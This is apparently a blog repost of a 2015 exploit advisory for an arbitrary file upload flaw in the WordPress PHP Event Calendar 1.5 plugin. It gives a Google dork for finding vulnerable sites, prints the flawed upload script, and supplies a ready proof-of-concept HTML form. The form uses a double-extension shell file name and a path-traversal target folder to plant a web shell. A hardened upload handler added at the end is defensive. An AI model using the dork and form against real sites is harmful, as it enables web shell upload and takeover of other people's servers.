Flash Go

WordPress PHP Event Calendar 1.5 Arbitrary File Upload

#- Title: WordPress PHP Event Calendar Arbitrary File Upload
#- Author: CrashBandicot
#- Date: 04/02/2015
#- Vendor : phpeventcalendar.com
#- Developer : -
#- Link Download : wordpress.org/plugins/php-event-calendar/
#- Google Dork: inurl:wp-content/plugins/php-event-calendar/
#- Tested on : MSwin
#- Fixed in Version : > 1.5
=======================================================================

 &- Vulnerability : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php ( "Uploadify.php" )


Bug Code :

<?php
/*
Uploadify
Copyright (c) 2012 Reactive Apps, Ronnie Garcia
Released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/

// Define a destination
//$targetFolder = '/uploads'; // Relative to the root
// The destination is read from the request, so the client chooses the directory
$targetFolder = $_POST['targetFolder']; // wp upload directory
$dir = str_replace('\\','/',dirname(__FILE__));

// The token check is commented out: nothing in this script verifies the request
//$verifyToken = md5('unique_salt' . $_POST['timestamp']);

if (!empty($_FILES)) {
    $tempFile = $_FILES['Filedata']['tmp_name'];
    //$targetPath = $dir.$targetFolder;
    $targetPath = $targetFolder;
    // The stored name is built from two client-supplied values
    $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];
    $targetFile = rtrim($targetPath,'/') . '/' . $fileName;

    // Validate the file type
    $fileTypes = array('jpg','jpeg','gif','png'); // File extensions
    $fileParts = pathinfo($_FILES['Filedata']['name']);

    // Only the last extension is compared, so a name such as "x.php.gif" passes
    if (in_array($fileParts['extension'],$fileTypes)) {
        move_uploaded_file($tempFile,$targetFile);
        echo '1';
    } else {
        echo 'Invalid file type.';
    }
}




&- When Vulnerable : *Blank*

Proof Of Concept :

Material : Sh3ll.php.gif (if supported) / Upload image.gif


HTML Code : 

<div><form action="http://3xploi7.com/wp-content/plugins/php-event-calendar/server/classes/uploadify.php"  method="post" enctype="multipart/form-data">
<input type="file" name="Filedata" id="file" ><br>
<input type="text" name="targetFolder" value="../../../../../" id="file" ><br>
<input type="text" name="user_id" value="3xploi7" id="file" ><br>
<input type="submit" name="submit" value="3xploi7ed !" >
</form></div>

Shell Access ? Here
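
A hardened form of the upload handler, as an added example (not the plugin's code and not the vendor's fix): the destination is a server-side value instead of `targetFolder`, the stored name is generated instead of being built from `user_id` and the client file name, and exactly one allow-listed extension is kept. The function name `store_image_upload`, the `$uploadDir` parameter and the assumption that the caller has already authenticated the request are assumptions of this example.

```php
<?php
// Added example, not the plugin's code. Assumes the request was already
// authenticated and authorized before this function is called.

const ALLOWED_IMAGE_TYPES = [   // extension => MIME type expected from the content
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
    'png'  => 'image/png',
];

/**
 * Store one uploaded image under $uploadDir, which must come from server
 * configuration and never from request data. Returns the stored path.
 * Hypothetical call: store_image_upload($_FILES['Filedata'], $uploadDir);
 */
function store_image_upload(array $file, string $uploadDir): string
{
    $tmp = $file['tmp_name'] ?? '';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($tmp)) {
        throw new RuntimeException('Upload failed.');
    }

    // The client name is used only to read its final extension, then discarded.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_IMAGE_TYPES)) {
        throw new RuntimeException('Invalid file type.');
    }

    // The detected content type must agree with the extension. This alone does
    // not stop a crafted image that carries script text, so it is one layer only.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($mime !== ALLOWED_IMAGE_TYPES[$ext]) {
        throw new RuntimeException('File content does not match its extension.');
    }

    // Server-generated name: no client prefix, no path separators, and a single
    // extension, so a name like "x.php.gif" can never reach the disk.
    $target = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmp, $target)) {
        throw new RuntimeException('Could not store upload.');
    }
    return $target;
}
```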





You are now reading the article WordPress PHP Event Calendar 1.5 Arbitrary File Upload at the link address https://minatoet.blogspot.com/2015/11/wordpress-php-event-calendar-15.html
